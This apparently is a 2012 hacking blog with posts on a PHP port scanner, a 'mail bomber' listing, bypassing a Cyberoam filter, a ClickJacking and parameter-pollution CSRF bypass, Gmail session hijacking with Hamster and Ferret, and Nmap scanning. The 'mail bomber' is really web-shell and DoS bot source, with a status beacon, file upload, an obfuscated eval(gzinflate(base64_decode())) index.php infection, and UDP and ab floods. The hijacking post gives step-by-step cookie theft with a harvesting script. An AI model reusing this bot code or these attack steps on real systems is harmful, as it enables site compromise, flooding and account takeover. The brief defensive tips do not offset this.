Monday, 30 January 2012

PHP Vulnerability Hunter

PHP Vulnerability Hunter is a PHP fuzzing tool that scans for several different vulnerability classes by dynamic program analysis: it instruments the application, feeds it generated input and watches what the code does with it. It can detect arbitrary command execution, local file inclusion, arbitrary file upload and several other types of vulnerabilities.
Changes: added tooltips to the GUI, an input map report, automatic error reporting, a port setting, a static analysis phase, and a ton more. Minor CLI tweaks. Code annotation improvements and an updated help menu shortcut.

PHP Simple port scanner

Range: 1-1000. You can change the scanned range on this line:

for ($i = 1; $i <= 1000; $i++) {

How does the script work?
Upload it somewhere, then in the URL bar call the script with ?ip=[someone's IP] appended (the ip query parameter is what the script reads), press Enter and wait for the scan to finish. The script then lists the ports that are open on that host.

<?php
// Simple TCP connect scanner: tries fsockopen() against every port in the
// range and reports the ones that accept a connection. Target comes from ?ip=<host>.
$ip = isset($_GET['ip']) ? $_GET['ip'] : '';
if ($ip !== '') {
    // Never echo raw request input back into the page.
    $safe_ip = htmlspecialchars($ip, ENT_QUOTES, 'UTF-8');
    for ($i = 1; $i <= 1000; $i++) {
        // 1-second timeout per port; with the default timeout 1000 ports take ages.
        $conn = @fsockopen($ip, $i, $errno, $errstr, 1);
        if ($conn) {
            echo "Port $i is open on $safe_ip. <br />";
            fclose($conn);
        }
    }
}

PHP Mail Bomber Script

PHP mail bomber script available here:

Note that, despite the title, the listing contains no mail-sending code at all. It is a remotely controlled DoS/web-shell script: it answers a status beacon ("itsoknoproblembro"), kills Perl processes, accepts file uploads, checks and (with an elided payload) infects the site's index.php, and runs UDP and ApacheBench ("ab") flood commands, all driven by an action parameter in GET and POST requests.

PHP Code:

<?php
// Listing as posted, reformatted for readability only. cmdexec() is called
// throughout but is never defined in the listing, and $base is used inside
// stoped() without a global declaration.
error_reporting(0);
$base = dirname(__FILE__) . "/";

function stoped() {
    cmdexec("killall -9 perl; killall -9 perl-bin; killall -9 perl-cgi;");
    unlink($base . "start.php"); unlink($base . ""); unlink($base . ""); unlink($base . "startphp.php");
    print "<stopcleandos>Stop & Clean</stopcleandos>";
    apache_child_terminate();
}

function UploadFile($File) {
    cmdexec("killall -9 perl"); cmdexec("killall -9 perl-bin"); cmdexec("killall -9 perl-cgi");
    $target_path = "./";
    $target_path = $target_path . basename($File['name']);
    move_uploaded_file($File['tmp_name'], $target_path);
}

function curPageURL() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") { $pageURL .= "s"; }
    $pageURL .= "://";
    if (/* condition not legible on the page */) {
        /* branch not legible on the page */
    } else {
        /* branch not legible on the page */
    }
}

function DNullRequest() {
    @ob_start();
    print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
}

if ($_GET['action'] == "status") { print "itsoknoproblembro"; }
if ($_GET['action'] == "start.php") { cmdexec("ps | grep -r perl"); }
if ($_GET['action'] == "startphp.php") { cmdexec("ps | grep -r php"); }
if ($_GET['action'] == "infection") {
    $up = "<?php eval(gzinflate(base64_decode('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')));";
    $index = $_SERVER['DOCUMENT_ROOT'] . "/index.php";
    if (file_exists($index)) {
        $fp = @fopen($index, 'a+');
        fclose($fp);
        $content = file_get_contents($index);
        // The else branches are reconstructed; the three messages appear in this order on the page.
        if (eregi("RSqMi6uu", $content)) {
            print "<infectdos>Infected</infectdos>";
        } else {
            print "<infectdos>Not Infected</infectdos>";
        }
    } else {
        print "<infectdos>N E I</infectdos>";
    }
}

switch ($_POST['action']) {
    case "upload":
        UploadFile($_FILES['file']);
        break;
    case "ust":
        $page = curPageURL(); $ip = $_POST['ip']; $port = "11"; $out = $page . "\n";
        $socket = stream_socket_client("udp://$ip:$port");
        if ($socket) { stream_set_write_buffer($socket, 0); stream_socket_sendto($socket, $out); }
        break;
    case "ab":
        $url = $_POST['url']; $c = $_POST['c']; $n = $_POST['n'];
        cmdexec("ab -c $c -n $n $url");
        break;
}

Sunday, 15 January 2012

how to hack cyberoam

This trick is presented by LOKESH SINGH.
Stepwise description:
1. First of all we need to get the footprint IP (the address of the Cyberoam gateway). A simple method to get the footprint IP:
2. Open your Mozilla Firefox web browser and type in the following site.
3. When you open the site you will see something like this:

Click on "I Understand the Risks" (this accepts the gateway's self-signed SSL certificate).
Click on "Add Exception".

4. Now we have got the footprint IP.
The next thing we need is a port for accessing it.
Use port 3128, the standard HTTP proxy port; it is open by default on a Cyberoam system that has Internet access.
6. This is a portable version of Proxifier, so it does not need to be installed. Just click on it and extract it anywhere you want; I prefer a pen drive.
7. After that you will get some files like this. Click on Proxifier to run it.

8. Now look at the task bar. You will see something like this; click on it.

11. Now do the settings as shown below (the footprint IP as proxy address, port 3128) and click OK.


How to access the blocked website ?

Download UltraVPN, a client/server SSL VPN solution based on OpenVPN that encrypts and anonymises your network connection.

Who uses UltraVPN?
It is used in environments where, for some reason, access to the Internet is restricted.
It can be used by any individual who simply wants to protect his privacy, either on a LAN or on a public hotspot.

How can I use UltraVPN?
Download the client software and create an account (username, password); you are then able to connect to the VPN. Keep in mind that the tunnel ends at the provider's server, so everything your local network can no longer see, the UltraVPN operator can.

What can you do with UltraVPN?
  • access blocked websites from within a corporate environment;
  • use software like Skype or MSN if it is blocked;
  • protect your e-mail and browsing privacy.

Thursday, 12 January 2012

Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution

This idea occurred to me a few weeks back when discussing the potential impact of ClickJacking attacks with Luca. Submitting forms using ClickJacking is hard work and is only successful in very rare scenarios. The Twitter ClickJacking attack was one famous instance where form submission was involved, but it was a form that was submitted over a 'GET' request.

In this post I will discuss a technique that can be used to bypass token-based CSRF countermeasures and submit POST-based forms with attacker-controlled data using ClickJacking. This works on JSP applications and partially on ASP.NET applications.

Let us take the case of a simple primary Email ID update form. Such forms are common in many web applications. They are simple but extremely important, if an attacker manages to force a victim to update his primary Email ID with that of the attacker’s ID then the attacker can perform a password reset and compromise the victim’s account.

A sample Email ID update form is given below, this contains a ‘csrf-token’ parameter for CSRF protection:
<form method="POST">
<input type="text" name="email" value="">
<input type="hidden" name="csrf-token" value="a0a0a0a0a0a">
<input type="submit" value="Update">
</form>

Let's say this form is available at ''.
Since the form has no 'action' attribute, on submission it is posted to the current URL in the address bar, which will be ''.

The server side of 'updateEmail.jsp' would typically look like this (csrfTokenIsValid() stands for whatever token check the application uses):
<%
String email = request.getParameter("email");
String token = request.getParameter("csrf-token");
if (email != null && csrfTokenIsValid(token)) {
    // process the form and update the email ID
} else {
    // display an empty form to the user (CSRF token included)
}
%>

The application checks whether the request carries a valid CSRF token; if not, it displays the form to the user.

Now, to submit our sample form using ClickJacking, the attacker includes an iframe like this, with the attacker's address supplied as the 'email' query-string parameter of the src URL:
'<iframe src=""></iframe>'

When this request reaches the server the application displays the update form. When the victim submits this form through the ClickJacking overlay, the request sent to the server looks like this:
POST /updateEmail.jsp? HTTP/1.1
Content-Type: application/x-www-form-urlencoded

email=&csrf-token=a0a0a0a0a0a

Since the victim did not fill in the form, the 'email' parameter in the POST body is blank. However, because the form has no action attribute, it is submitted to the current URL, and that URL's query string carries the attacker-supplied value for the 'email' parameter.

The request therefore contains two values for the 'email' parameter, one in the POST body and one in the query string. Enter HTTP Parameter Pollution: when the server-side JSP code calls request.getParameter("email"), the value returned is the one from the query string, not the one from the POST body (the servlet container parses the query string before the body and getParameter() returns the first value). Since the attacker controls that value, he can trick the victim into updating the account with the attacker's mail ID.

This attack also works in cases where the form is submitted with JavaScript like this:
<form id="updateForm" onsubmit="return process()">
<input type="text" name="email" value="">
<input type="hidden" name="csrf-token" value="a0a0a0a0a0a">
<input type="submit" value="Update">
</form>

<script>
function process() {
    var form = document.getElementById("updateForm");
    // check if email is set
    form.action = document.location.href; // the entire current URL, query string included
    form.method = "post";
    return true;
}
</script>

Apart from JSP applications, this attack can be extended to ASP.NET applications as well.
However, since ASP.NET joins duplicate parameters with a ',' (comma), it is not as clean. But there are plenty of places where a trailing ',' won't hurt. In ASP.NET applications the form action is always set by the framework, because of the runat="server" attribute, to the current URL including its query string. The only remaining requirement is that the application reads the value through Request.Params, the collection that merges QueryString and Form. Even if the application does not use Request.Params, forms submitted over 'GET' are still vulnerable. So all ASP.NET applications using Request.Params or submitting forms over 'GET' are vulnerable to this attack.

A similar attack is also possible on classic ASP applications where the form element is of the kind described earlier and is submitted over 'GET'. As with ASP.NET, a trailing comma is introduced here as well. A more detailed description of HTTP Parameter Pollution on ASP and ASP.NET applications and the significance of Request.Params is given in the referenced whitepaper, which also discusses how HPP can be used to bypass WAFs.
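The following is an added example, not code from the original post. It models the two server-side behaviours the attack relies on (a servlet container's getParameter(), which parses the query string first and returns the first value; ASP.NET's Request.Params, which joins duplicates with a comma) next to a fail-closed reader, and runs the update-email logic from the text over a constructed copy of the ClickJacked request. The request strings, the attacker address and the token value are assumptions made for the example.

```python
# Added example, not code from the original post. Models JSP/Tomcat
# getParameter() (query string first, first value wins), ASP.NET Request.Params
# (duplicates joined with ',') and a reader that fails closed on duplicates.
from urllib.parse import parse_qsl

# Constructed: what the victim's browser sends after the ClickJacked submit.
# The attacker's address rides in the query string of the framed URL; the
# victim typed nothing, so the body's email field is empty.
QUERY_STRING = "email=attacker%40evil.example"
POST_BODY = "email=&csrf-token=a0a0a0a0a0a"
EXPECTED_TOKEN = "a0a0a0a0a0a"   # the token the page's sample form carries


def _pairs(encoded):
    """Decode an application/x-www-form-urlencoded string into (name, value) pairs."""
    return parse_qsl(encoded, keep_blank_values=True)


def jsp_get_parameter(query, body, name):
    """Model of request.getParameter() in a servlet container: the query string
    is parsed before the POST body and the first value for a name is returned."""
    for key, value in _pairs(query) + _pairs(body):
        if key == name:
            return value
    return None


def aspnet_request_params(query, body, name):
    """Model of ASP.NET Request.Params: QueryString and Form are merged into one
    collection and duplicate names are joined with a comma."""
    values = [v for k, v in _pairs(query) if k == name]
    values += [v for k, v in _pairs(body) if k == name]
    return ",".join(values) if values else None


def body_parameter_strict(query, body, name):
    """Hardened reader for a POST-only form: take the value from the body alone
    and refuse the request if the same name also appears in the query string,
    so a polluted request fails closed instead of silently picking one value."""
    if any(k == name for k, _ in _pairs(query)):
        raise ValueError(f"parameter {name!r} present in both query string and body")
    for key, value in _pairs(body):
        if key == name:
            return value
    return None


def update_email_handler(query, body, get_param, expected_token=EXPECTED_TOKEN):
    """The updateEmail.jsp logic from the text: a valid token and a non-empty
    email trigger the update. Returns the email that would be stored, or None
    when the form would simply be redisplayed."""
    token = get_param(query, body, "csrf-token")
    email = get_param(query, body, "email")
    if token != expected_token or not email:
        return None
    return email


if __name__ == "__main__":
    for label, reader in (("JSP getParameter", jsp_get_parameter),
                          ("ASP.NET Request.Params", aspnet_request_params)):
        stored = update_email_handler(QUERY_STRING, POST_BODY, reader)
        print(f"{label}: stored email = {stored!r}")
    try:
        update_email_handler(QUERY_STRING, POST_BODY, body_parameter_strict)
    except ValueError as err:
        print(f"strict reader: rejected ({err})")
```

With the JSP model the account ends up with attacker@evil.example; with the ASP.NET model it ends up with "attacker@evil.example," (the trailing comma the text mentions); the strict reader rejects the request. In all three cases the CSRF token was valid, because the token check never asks where the email value came from.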

Tuesday, 10 January 2012

man-in-the-middle attacks


 As we have demonstrated with those examples, MITM attacks are incredibly effective and increasingly hard to detect. In the third part of this article we will examine session hijacking, which is no different. As with the previous two articles I will describe the theory behind session hijacking, demonstrate the technique in practice, and discuss detection and prevention tips.

Session Hijacking

The term session hijacking is thrown around frequently and encompasses a variety of different attacks. In general, any attack that involves the exploitation of a session between devices is session hijacking. When we refer to a session, we are talking about a connection between devices in which there is state. That is, there is an established dialogue in which a connection has been formally set up, the connection is maintained, and a defined process must be used to terminate the connection. When we talk about sessions theoretically it’s a bit confusing, so it may help to think of a session in a more practical sense.
In this article we will be talking about session hijacking through cookie stealing, which involves HTTP sessions. If you think about some of the common websites you visit that require login credentials, those are great examples of session-oriented connections. You must be authenticated by the website with your username and password to formally set up the session, the website maintains some form of session tracking to ensure you are still logged in and are allowed to access resources (often done with a cookie), and when the session is ending the credentials are cleared and the session ends. This is a very specific example of a session and even though we do not always realize it, sessions are occurring constantly and most communications rely on some form of session or state-based activity.

  Figure 1: A normal session

As we have seen in previous attacks, nothing that goes across the network is safe, and session data is no different. The principle behind most forms of session hijacking is that if you can intercept certain portions of the session establishment, you can use that data to impersonate one of the parties involved in the communication so that you may access session information. In the case of our earlier example, this means that if we were to capture the cookie that is used to maintain the session state between your browser and the website you are logging into, we could present that cookie to the web server and impersonate your connection. If that sounds too good to be true from an attacker's standpoint, well... it is.


Figure 2: Session Hijacking

Now that we have a little bit of theory in the books, let us delve into a practical example.

Stealing Cookies with Hamster and Ferret

In our practical scenario we will be performing a session hijacking attack by intercepting the communication of a user logging into his Gmail account. Using this intercepted communication we will impersonate that user and access the account from our attacking machine.
In order to perform this attack we will be using two tools straight out of the pet store, named Hamster and Ferret. Both tools can be downloaded from here. They are command-line tools, so the hamster folder can be extracted to an easy-to-reach location.
Alternatively, you can download and use BackTrack 4. BT4 is a Linux live-CD distribution designed specifically for hacking and penetration testing that comes with a myriad of preinstalled and precompiled tools, Hamster and Ferret among them. You can download BT4 from here. You will then find Hamster in the /pentest/sniffers/hamster folder. The screenshot examples used in the rest of this tutorial are taken from BT4.
The first step in this form of session hijacking is to capture the traffic of the victim user as he browses Gmail. This traffic can be captured with any packet sniffing application such as TCPDump or Wireshark, but in order to see the right packets on a switched network you will need to employ a technique such as ARP cache poisoning (discussed in the first article in this series).

Figure 3: Capturing traffic of the user browsing to Gmail

Once you have captured the traffic of the victim user browsing to Gmail you will need to save the capture file into the Hamster directory. For the purposes of this example, we have named our file victim_gmail.pcap. When that file is in place, we will use Ferret to process it. This is done by changing to the Hamster folder and running the command ferret -r victim_gmail.pcap. Ferret will process the file and create a hamster.txt file that Hamster uses for the actual hijacking of the session.
Figure 4: Processing the capture file with Ferret

With our HTTP data intercepted and prepared for use, we can use Hamster to actually execute the attack. Hamster itself actually runs as a proxy that provides an interface for browsing and using stolen session cookies. In order to start the Hamster proxy you can simply execute Hamster with no command line options.

 Figure 5: Starting Hamster

Once executed, you will need to open your browser and configure its proxy settings to match those provided to you by the Hamster output. By default, this means that you would configure your proxy settings to use the local loop-back address on port 1234. You can access these settings in Internet Explorer by selecting Tools, Internet Options, Connections, LAN Settings, and placing a check box in the Use a proxy server for your LAN box.

 Figure 6: Configuring proxy settings for use with Hamster

Now that the proxy settings have been applied you can access the Hamster console in your browser by browsing to http://hamster. Hamster will use the file created by Ferret to produce a list of IP addresses for which session information has been intercepted and display those IP addresses in the right pane of the browser. The file we have created only contains the single IP address of the victim, so if we click that, the left pane is populated with the sessions available for hijacking.

 Figure 7: The Hamster GUI

We see that the Gmail session is listed, and if you click that link you will be pleased to be presented with a new window that has you logged in to the victim's Gmail account!

   Figure 8: Successfully hijacked Gmail account!
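As an added example (not part of the original article, and not Ferret or Hamster code), here is the core of what the two tools do with a capture: pull the Host and Cookie headers out of plaintext HTTP requests, group the cookies per client IP and site the way Hamster lists them, and build the Cookie header a proxy would attach to replay the session. The captured requests, host names, client addresses and cookie values are constructed for the example, and the "looks like a session cookie" name heuristic is an assumption, not a standard.

```python
# Added example, not Ferret/Hamster code: cookie harvesting from captured
# plaintext HTTP requests, grouped per (client IP, host) for replay.
import re
from collections import defaultdict

# Constructed capture: (client IP, raw HTTP request) as reassembled from a sniff.
CAPTURED_REQUESTS = [
    ("192.168.1.50",
     "GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
     "Cookie: SID=abc123; HSID=def456\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("192.168.1.50",
     "GET /mail/inbox HTTP/1.1\r\nHost: mail.example.com\r\n"
     "Cookie: SID=abc123; HSID=def456; PREF=lang%3Den\r\n\r\n"),
    ("192.168.1.51",
     "GET / HTTP/1.1\r\nHost: www.example.org\r\nCookie: PHPSESSID=9f8e7d6c\r\n\r\n"),
    ("192.168.1.51",
     "GET /static/logo.png HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
]

# Assumed heuristic for names that look like session identifiers.
SESSION_NAME_HINT = re.compile(r"sid|sess|session|token|auth", re.I)


def parse_request(raw):
    """Return (host, {cookie name: value}) for one raw HTTP request.
    Requests without a Cookie header yield an empty dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return headers.get("host"), cookies


def extract_sessions(captured):
    """Group every cookie seen per (client IP, host), merging across requests.
    This is the per-IP session list Hamster presents for hijacking."""
    sessions = defaultdict(dict)
    for client_ip, raw in captured:
        host, cookies = parse_request(raw)
        if host and cookies:
            sessions[(client_ip, host)].update(cookies)
    return dict(sessions)


def replay_cookie_header(sessions, client_ip, host):
    """The Cookie header an attacker's proxy attaches to impersonate the victim."""
    jar = sessions.get((client_ip, host), {})
    return "; ".join(f"{name}={value}" for name, value in jar.items())


def likely_session_cookies(jar):
    """Names in a cookie jar that look like session identifiers, sorted."""
    return sorted(name for name in jar if SESSION_NAME_HINT.search(name))


if __name__ == "__main__":
    sessions = extract_sessions(CAPTURED_REQUESTS)
    for (client_ip, host), jar in sessions.items():
        print(f"{client_ip} -> {host}: session cookies {likely_session_cookies(jar)}")
        print("   replay with: Cookie:", replay_cookie_header(sessions, client_ip, host))
```

Everything here depends on the requests being readable on the wire: a session carried only over HTTPS, with the cookie flagged Secure, never shows up in the capture, which is the whole defence against this class of attack.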

Defending Against Session Hijacking

There are many different forms of session hijacking, so the defenses for them vary. Just like the other MITM attacks we have evaluated, session hijacking is difficult to detect and even more difficult to defend against because it is a mostly passive attack. Unless the malicious user performs some type of obvious action when he accesses the hijacked session, you may never know that he was there. Here are a few things you can do to better defend against session hijacking:

  • Save Online Banking for Home - The chance of somebody intercepting your traffic on your home network is much less than on your work network. This isn't because your home computer is more secure (let's face it, it's probably less secure), but the simple matter of fact is that if you only have one or two computers at home, the most you have to worry about in terms of session hijacking is your 14-year-old son watching hacking videos on YouTube. On a corporate network you don't know what is going on down the hall or in the branch office 200 miles away, so the potential attack sources multiply. One of the biggest targets for session hijacking is online banking, but this principle applies to anything.
  • Be Cognizant - Smart attackers will not leave any evidence that they have been in one of your secure accounts, but even the most seasoned hackers make mistakes. Being aware when you are logged into session-based services can help you determine if somebody else is walking in your shadow. Keep an eye out for things that seem out of place, and pay attention to "Last Logon Time" fields to ensure everything matches up.
  • Secure Your Internal Machines - Once again, attacks like these are most commonly executed from inside the network. If your network devices are secure, there is less of a chance of compromised hosts being used to launch a session hijacking attack.
  • Keep Session Cookies Off the Wire in the Clear - Everything above relies on the session cookie travelling in plaintext HTTP. A site that serves the entire logged-in session over HTTPS and marks the cookie Secure gives Ferret nothing to harvest, so as a user prefer the HTTPS version of a service wherever one is offered.

Saturday, 7 January 2012

Advance hacking with NMAP

The point of port scanning a server is to detect its open ports and the services listening on them. Once an attacker knows all the services running on your server, he can search for known vulnerabilities in them and exploit those to take control of your website. In the port scanning example we will use the most popular port scanner, Nmap. The Nmap Security Scanner is available for Linux, Mac and Windows users.

Host Discovery
[bryan@nereid bryan] sudo nmap -n -sP
(-n skips reverse DNS lookups; -sP, the ping scan, is spelled -sn in current Nmap releases)

Host appears to be up.
MAC Address: 00:0C:F1:D2:29:4C (Intel)
Host appears to be up.
MAC Address: 00:0B:DB:27:40:47 (Dell ESG Pcba Test)
Nmap finished: 20 IP addresses (2 hosts up) scanned in 0.646 seconds

Port Scanning
bryan@firemaw:~$ sudo nmap

Interesting ports on
(The 1667 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   open   ssh
80/tcp   open   http
427/tcp  closed svrloc
443/tcp  closed https
3689/tcp open   rendezvous
8080/tcp open   http-proxy

Application Fingerprinting
bryan@firemaw:~$ sudo nmap -n -sV

Interesting ports on
(The 1667 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         tnftpd 20040810
22/tcp   open   ssh         OpenSSH 3.8.1p1 (protocol 1.99)
80/tcp   open   http        Apache httpd 1.3.33 ((Darwin) PHP/4.4.1)
427/tcp  closed svrloc
443/tcp  closed https
3689/tcp open   rendezvous  Apple iTunes 6.0.4 (on Mac OS X)
8080/tcp open   http-proxy? 
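As an added example, not from the original post, here is the check a defender runs on a result like the one above: parse Nmap's port table into records, diff the open ports against a baseline of what the host is supposed to expose, and pull out the version strings that an attacker would feed into a vulnerability search. NMAP_OUTPUT is the page's own fingerprinting listing pasted in as a string; the target address on its first line and the BASELINE set are constructed for the example.

```python
# Added example, not from the original post: parse Nmap normal output and
# compare it with an expected-services baseline.
import re

# The page's -sV listing; the host address on the first line is made up.
NMAP_OUTPUT = """\
Interesting ports on 192.0.2.10:
(The 1667 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         tnftpd 20040810
22/tcp   open   ssh         OpenSSH 3.8.1p1 (protocol 1.99)
80/tcp   open   http        Apache httpd 1.3.33 ((Darwin) PHP/4.4.1)
427/tcp  closed svrloc
443/tcp  closed https
3689/tcp open   rendezvous  Apple iTunes 6.0.4 (on Mac OS X)
8080/tcp open   http-proxy?
"""

# One port line: "<port>/<proto> <state> <service>[?] [<version text>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)\s*(?P<version>.*)$"
)

# Constructed baseline: the services this host is supposed to offer.
BASELINE = {(22, "tcp"), (80, "tcp"), (443, "tcp")}


def parse_nmap_ports(text):
    """Turn Nmap's normal-output port table into a list of dicts."""
    ports = []
    for line in text.splitlines():
        match = PORT_LINE.match(line.strip())
        if not match:
            continue                      # header, notes, blank lines
        service = match["service"]
        ports.append({
            "port": int(match["port"]),
            "proto": match["proto"],
            "state": match["state"],
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),   # Nmap's '?' marks an unconfirmed guess
            "version": match["version"].strip() or None,
        })
    return ports


def diff_against_baseline(ports, baseline):
    """Open ports not in the baseline (investigate) and baseline ports not open."""
    open_ports = {(p["port"], p["proto"]) for p in ports if p["state"] == "open"}
    return {
        "unexpected_open": sorted(open_ports - baseline),
        "expected_not_open": sorted(baseline - open_ports),
    }


def version_inventory(ports):
    """port -> version string for open, fingerprinted services: the list an
    attacker searches for known vulnerabilities, and the list you should patch."""
    return {p["port"]: p["version"]
            for p in ports if p["state"] == "open" and p["version"]}


if __name__ == "__main__":
    parsed = parse_nmap_ports(NMAP_OUTPUT)
    print(diff_against_baseline(parsed, BASELINE))
    print(version_inventory(parsed))
```

On the listing above the diff flags 21, 3689 and 8080 as open but not in the baseline and 443 as expected but closed; the inventory pairs 21, 22, 80 and 3689 with their product versions, while 8080 carries no version because Nmap could only guess the service.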
